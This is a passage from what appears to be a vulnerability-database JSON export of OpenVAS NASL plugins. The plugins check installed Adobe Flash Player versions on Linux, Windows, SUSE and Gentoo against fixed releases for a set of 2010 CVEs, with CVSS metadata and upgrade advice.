script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version 10.1.102.64 or later\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/downloads/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nflashVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nflashVer = ereg_replace(pattern:\",\", string:flashVer, replace: \".\");\n\nif(flashVer)\n{\n if(version_in_range(version:flashVer, test_version:\"10\", test_version2:\"10.1.85.3\")||\n version_is_less(version:flashVer, test_version:\"9.0.289.0\")) {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.", "modified": "2017-02-10T00:00:00", "published": "2010-11-12T00:00:00", "id": "OPENVAS:801630", "href": "http://plugins.openvas.org/nasl.php?oid=801630", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_mult_vuln_nov10_lin.nasl 5263 2017-02-10 13:45:51Z teissa $\n#\n# Adobe Flash Player Multiple Vulnerabilities (Linux)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let attackers to execute arbitrary code or cause\n a denial of service via unknown vectors.\n Impact Level: Application/System\";\ntag_affected = \"Adobe Flash Player version 10.1.85.3 and prior on Linux\";\ntag_insight = \"The flaws are caused by unspecified errors, that can be exploited to execute\n arbitrary code or cause a denial of service.\";\ntag_solution = \"Upgrade to Adobe Flash Player version 10.1.102.64 or later\n For details refer, http://www.adobe.com/downloads/\";\ntag_summary = \"This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.\";\n\nif(description)\n{\n script_id(801630);\n script_version(\"$Revision: 5263 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-12 15:34:28 +0100 (Fri, 12 Nov 2010)\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\",\n \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\",\n \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\",\n \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\");\n script_bugtraq_id(44669);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities (Linux)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/41917\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb10-26.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_require_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Check for Adobe Flash Player version\nflashVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nflashVer = ereg_replace(pattern:\",\", string:flashVer, replace: \".\");\n\nif(flashVer)\n{\n if(version_in_range(version:flashVer, test_version:\"10\", test_version2:\"10.1.85.3\")||\n version_is_less(version:flashVer, test_version:\"9.0.289.0\")) {\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:18:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.", "modified": "2017-12-19T00:00:00", "published": "2010-11-12T00:00:00", "id": "OPENVAS:801629", "href": "http://plugins.openvas.org/nasl.php?oid=801629", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_mult_vuln_nov10_win.nasl 8178 2017-12-19 13:42:38Z cfischer $\n#\n# Adobe Flash Player Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\ntag_impact = \"Successful exploitation will let attackers to execute arbitrary code or cause\n a denial of service via unknown vectors.\n Impact Level: Application/System\";\ntag_affected = \"Adobe Flash Player version 10.1.85.3 and prior on Windows\";\ntag_insight = \"The flaws are caused by unspecified errors, that can be exploited to execute\n arbitrary code or cause a denial of service.\";\ntag_solution = \"Upgrade to Adobe Flash Player version 10.1.102.64 or later\n For details refer, http://www.adobe.com/downloads/\";\ntag_summary = \"This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.\";\n\nif(description)\n{\n script_id(801629);\n script_version(\"$Revision: 8178 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 14:42:38 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-12 15:34:28 +0100 (Fri, 12 Nov 2010)\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\",\n \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\",\n \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\",\n \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\");\n script_bugtraq_id(44669);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/41917\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb10-26.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version:vers, test_version:\"10\", test_version2:\"10.1.85.3\" ) ||\n version_is_less( version:vers, test_version:\"9.0.289.0\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"10.1.102.64\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:04:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Check for the Version of flash-player", "modified": "2018-01-04T00:00:00", "published": "2010-11-16T00:00:00", "id": "OPENVAS:1361412562310850149", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850149", "type": "openvas", "title": "SuSE Update for flash-player SUSE-SA:2010:055", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for flash-player SUSE-SA:2010:055\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Adobe Flash Player was updated to version 10.1.102.64 to fix\n a critical security issue.\n\n Adobe has posted advisories on their website:\n http://www.adobe.com/support/security/advisories/apsa10-05.html\n and also\n http://www.adobe.com/support/security/advisories/apsa10-26.html\n\n The following CVE entries were listed as fixed:\n CVE-2010-3639\n CVE-2010-3643\n CVE-2010-3647\n CVE-2010-3651\n CVE-2010-3976\n\n SUSE Linux Enterprise Desktop 11 GA and Service Pack 1, and openSUSE\n 11.1-11.3 have received updates.\n\n There currently is no updated version available for the Flash Player\n version 9 on SUSE Linux Enterprise Desktop 10 Service Pack 3 so far.\n It will be released as soon as it is available.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"flash-player on openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850149\");\n script_version(\"$Revision: 8287 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 08:28:11 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-055\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3651\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n script_name(\"SuSE Update for flash-player SUSE-SA:2010:055\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.102.64~0.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.102.64~0.2.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-15T11:57:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Check for the Version of flash-player", "modified": "2017-12-15T00:00:00", "published": "2010-11-16T00:00:00", "id": "OPENVAS:850149", "href": "http://plugins.openvas.org/nasl.php?oid=850149", "type": "openvas", "title": "SuSE Update for flash-player SUSE-SA:2010:055", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for flash-player SUSE-SA:2010:055\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Adobe Flash Player was updated to version 10.1.102.64 to fix\n a critical security issue.\n\n Adobe has posted advisories on their website:\n http://www.adobe.com/support/security/advisories/apsa10-05.html\n and also\n http://www.adobe.com/support/security/advisories/apsa10-26.html\n\n The following CVE entries were listed as fixed:\n CVE-2010-3639\n CVE-2010-3643\n CVE-2010-3647\n CVE-2010-3651\n CVE-2010-3976\n\n SUSE Linux Enterprise Desktop 11 GA and Service Pack 1, and openSUSE\n 11.1-11.3 have received updates.\n\n There currently is no updated version available for the Flash Player\n version 9 on SUSE Linux Enterprise Desktop 10 Service Pack 3 so far.\n It will be released as soon as it is available.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"flash-player on openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_id(850149);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-055\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3651\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n script_name(\"SuSE Update for flash-player SUSE-SA:2010:055\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.102.64~0.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.102.64~0.2.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-3648", "CVE-2008-4546", "CVE-2010-2160", "CVE-2010-3640", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-0186", "CVE-2010-2884", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-3645", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-0187", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-3976", "CVE-2010-2183", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2213", "CVE-2010-3650", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2214", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-2162", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-3649", "CVE-2010-2178"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201101-09.", "modified": "2019-03-14T00:00:00", "published": "2011-03-09T00:00:00", "id": "OPENVAS:136141256231069045", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069045", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201101-09 (adobe-flash)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201101_09.nasl 14171 2019-03-14 10:22:03Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69045\");\n script_version(\"$Revision: 14171 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 11:22:03 +0100 (Thu, 14 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-09 05:54:11 +0100 (Wed, 09 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-4546\", \"CVE-2009-3793\", \"CVE-2010-0186\", \"CVE-2010-0187\", \"CVE-2010-0209\", \"CVE-2010-1297\", \"CVE-2010-2160\", \"CVE-2010-2161\", \"CVE-2010-2162\", \"CVE-2010-2163\", \"CVE-2010-2164\", \"CVE-2010-2165\", \"CVE-2010-2166\", \"CVE-2010-2167\", \"CVE-2010-2169\", \"CVE-2010-2170\", \"CVE-2010-2171\", \"CVE-2010-2172\", \"CVE-2010-2173\", \"CVE-2010-2174\", \"CVE-2010-2175\", \"CVE-2010-2176\", \"CVE-2010-2177\", \"CVE-2010-2178\", \"CVE-2010-2179\", \"CVE-2010-2180\", \"CVE-2010-2181\", \"CVE-2010-2182\", \"CVE-2010-2183\", \"CVE-2010-2184\", \"CVE-2010-2185\", \"CVE-2010-2186\", \"CVE-2010-2187\", \"CVE-2010-2188\", \"CVE-2010-2189\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2884\", \"CVE-2010-3636\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n script_name(\"Gentoo Security Advisory GLSA 201101-09 (adobe-flash)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in Adobe Flash Player might allow remote attackers\n to execute arbitrary code or cause a Denial of Service.\");\n script_tag(name:\"solution\", value:\"All Adobe Flash Player users should upgrade to the latest stable\n version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-plugins/adobe-flash-10.1.102.64'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201101-09\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=307749\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=322855\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=332205\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=337204\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=343089\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-06.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-14.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-16.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-22.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-26.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201101-09.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 10.1.102.64\"), vulnerable: make_list(\"lt 10.1.102.64\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-09-05T11:22:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-3648", "CVE-2008-4546", "CVE-2010-2160", "CVE-2010-3640", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-0186", "CVE-2010-2884", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-3645", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-0187", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-3976", "CVE-2010-2183", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2213", "CVE-2010-3650", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2214", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-2162", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-3649", "CVE-2010-2178"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201101-09.", "modified": "2017-09-04T00:00:00", "published": "2011-03-09T00:00:00", "id": "OPENVAS:69045", "href": "http://plugins.openvas.org/nasl.php?oid=69045", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201101-09 (adobe-flash)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be 